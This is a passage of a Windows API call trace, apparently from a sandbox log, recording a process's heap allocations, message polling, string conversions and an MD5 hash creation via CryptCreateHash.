wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.381] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0206.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.382] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.382] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0206.382] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0206.382] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0206.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0206.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0206.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0206.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0206.383] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0206.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0206.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0206.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0206.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0206.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0206.486] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0206.487] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0206.487] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.487] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0206.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0206.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0206.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.489] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0206.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0206.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0206.490] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e38 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0206.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0206.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ea8, cbMultiByte=4, lpDefaultChar=0x0, 